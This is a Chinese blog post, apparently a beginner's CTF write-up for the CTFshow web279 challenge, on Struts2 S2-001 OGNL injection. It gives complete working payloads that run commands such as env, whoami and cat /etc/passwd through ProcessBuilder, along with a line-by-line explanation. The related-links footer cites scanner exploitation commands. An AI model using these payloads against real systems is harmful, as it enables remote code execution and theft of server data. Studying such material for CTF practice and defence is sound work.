web279(s2-001)

已于 2023-12-09 18:26:20 修改
阅读量1k 收藏 25
点赞数 21
文章标签: 学习
于 2023-12-09 18:21:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/134896095
版权

目前java小白一个,主要是学学别人的思路

进入题目,登录框一个

抓包也没发现什么东西

网上说是struts2框架

Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架

判断是不是基于struts2的一些方法:

1.通过页面回显的错误消息来判断,页面不回显错误消息时则无效

2.通过网页后缀来判断,如.do .action,有可能不准

        2.1如果配置文件中常数extension的值以逗号结尾或者有空值,指明了action可以不带后缀,那么不带后缀的uri也可能是struts2框架搭建的

        2.2如果使用Struts2的rest插件,其默认的struts-plugin.xml指定的请求后缀为xhtml,xml和json

3.判断 /struts/webconsole.html 是否存在来进行判断,需要 devMode 为 true

回到前面的网站标题s2-001

Vulhub漏洞系列:struts2漏洞 S2-001 - FreeBuf网络安全行业门户

struts2漏洞 S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。例如,在注册或登录页面中。如果提交失败,则服务器通常默认情况下将返回先前提交的数据。由于服务器用于%{value}对提交的数据执行OGNL表达式解析,因此服务器可以直接发送有效载荷来执行命令。

在登录框假如%{1+1}会返回2

看看paylaod

// 获取tomcat路径

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

// 获取web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

// 命令执行 env,flag就在其中

password=%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}&username=1

或者工具

struts2scan

分析

%的用途是在标志的属性为字符串类型时,计算OGNL表达式%{}中的值

#的用途访主要是访问非根对象属性,因为Struts 2中值栈被视为根对象,所以访问其他非根对象时,需要加#前缀才可以调用

$主要是在Struts 2配置文件中,引用OGNL表达式

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}


%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}

 解释

  1. 首先,使用了 Struts2 的 OGNL(Object-Graph Navigation Language)表达式语言来执行以下操作:

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start()

该代码创建了一个新的进程,并执行了一个命令,即 cat /etc/passwd。cat 命令用于查看文件内容,而 /etc/passwd 是一个包含系统用户信息的文件。

  • 接着,通过以下代码获取命令输出的输入流:

#b=#a.getInputStream()

  • 使用以下代码将输入流读取为字符流:

#c=new java.io.InputStreamReader(#b)

  • 创建一个缓冲字符读取器来读取字符流:

#d=new java.io.BufferedReader(#c)

  • 创建一个字符数组来存储读取到的字符:

#e=new char[50000]

  • 使用以下代码将字符读取到字符数组中:

#d.read(#e)

  • 通过以下代码获取当前请求的 HttpServletResponse 对象:

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse")

  • 最后,以下代码将字符数组转换为字符串,并将其输出到 HttpServletResponse 的输出流中:

#f.getWriter().println(new java.lang.String(#e))

#f.getWriter().flush()

#f.getWriter().close()

参考:

CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现_debug=command&expression表达式注入漏洞如何修复-CSDN博客

 目前也就是见识见识,胡言乱语记录了一下,以后懂得多了回来补充补充

_MOB_
关注
  • 21
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
然而,这个框架的历史上存在一系列的安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016、s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
2021-10-14【从0开始学web279-300 java
yzl_007的博客
10-14 275
【从0开始学web279-300 java 【从0开始学web279-300 javaweb279web278-297 279-297题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 web279 打开环境之后查看源码,s2-001是一个struts2命令执行漏洞编号 <a style='text-decoration:none' href='/S2-001/'>where is flag?</a> 继续访问:http:
web279~300 Struts2漏洞
pandasaymmm的博客
03-25 190
另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生产环境中几乎不可能存在,因此就变得很鸡肋的,但我认为也不是绝对的,万一被黑了专门丢了一个开启了 debug 模式的应用到服务器上作为后门也是有可能的。加强版poc:S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。
ctfshow web入门 java web279-283
m0_62207170的博客
04-22 449
ctfshow web入门 java web279-283
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
CTFSHOW JAVA篇
羽的博客
12-17 3727
WEB279-294 296-297 脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47e-4f
ctfshowJAVA
njh18790816639的博客
04-16 3024
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
Struts s2-016 s2-017 补丁
09-27
对Struts s2-016 s2-017的官方修复建议是升级struts, 但对正在运行的系统,许多依赖包会导致运行出错, 直接更改代码是更快的选择. 本补丁是针对 struts2-core-2.0.11.jar 的修改, 把文件中 bin下的文件直接copy到 web...
ENSIBS-S2-Web
04-20
ENSIBS-S2-Web Web模块简介。 该模块是瓦讷市ENSIBS的学徒制,是网络防御课程的一部分。 FrédéricLinot教授的课程。 TP由xThaz进行。 创建天气Web应用程序。 语境 本周,您将需要创建一个网站,显示特定城市的...
struts2 s2-045
03-22
Struts2 S2-045 是一个著名的安全漏洞,主要影响使用Apache Struts2框架开发的Web应用程序。这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行(RCE)的可能性,这使得攻击者可以完全控制受...
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 313
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
kubernetes学习日志(七)
qq_47037022的博客
07-18 438
本文记录了service管理,ingress管理,Dashboard管理插件,集群鉴权策略,角色与全局角色,赋权与全局角色赋权。
手写简易版Spring IOC容器02【学习
最新发布
weixin_44794897的博客
07-19 362
其中applyPropertyValues用于从beanDefinition中读取属性的配置信息然后通过BeanUtil(hutool-all中提供的类)为其赋值@Overridetry {// 创建bean实例Class<?if (null!break;// 设置属性值try {// 从beanDefinition中获取property通过Resource获取文件流。
博客前端项目学习day03——框架页
qq_53237241的博客
07-19 253
【代码】博客前端项目学习day03——框架页。
python 语法学习 day 7
2303_79973545的博客
07-15 321
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
钓鱼攻击 - 基础学习
Reset
07-16 709
钓鱼攻击是一种典型的欺诈式攻击手段,攻击者通过伪装成可以信任的角色,利用电子邮件或其他通信渠道向被攻击者发送植入了木马的文档或恶意链接,并诱骗被攻击者点击执行,从而实现对被攻击者计算机的远程控制或恶意程序感染。
安卓学习中遇到的问题【bug】
小心星的博客
07-15 1110
安卓学习中遇到的问题【bug】
Cadence23学习笔记(三)
zjb6668的博客
07-15 360
焊接FPC的时候先上锡,焊台加热后再图上焊油,再放置元器件,再加热:万用表测电流只需要把表笔接到电流的孔位即可测量电流,不需要接再串联一个负载:有些线性电源两个通道可以串联,并联起来使用;
s2-005漏洞解决方法
09-09
S2-005漏洞是指在使用Struts 2框架的Web应用程序中存在的一种安全风险,攻击者可以通过构造恶意请求利用该漏洞来执行任意的命令。 要解决S2-005漏洞,首先需要确认Web应用程序是否使用了受漏洞影响的Struts 2版本。如果是受影响的版本,应考虑升级Struts 2到最新的安全补丁版本。 此外,还可以采取以下措施来防止利用S2-005漏洞的攻击: 1. 过滤用户输入:在服务器端对用户输入进行严格的验证和过滤,确保应用程序只接收到合法的数据。 2. 使用安全配置文件:在Struts 2配置文件(struts.xml)中添加安全配置,限制对敏感资源的访问和执行。 3. 强化访问控制:在Struts 2应用程序中实施严格的访问控制,确保只有授权的用户才能执行敏感操作。 4. 日志监控:监控应用程序的访问日志,及时发现异常行为,并采取相应的应对措施。 5. 安全测试:定期进行安全测试,检查应用程序是否存在其他潜在的安全漏洞,并及时修复。 综上所述,通过升级Struts 2框架、过滤用户输入、使用安全配置文件、强化访问控制、日志监控和安全测试等措施,可以有效地解决S2-005漏洞,提高Web应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值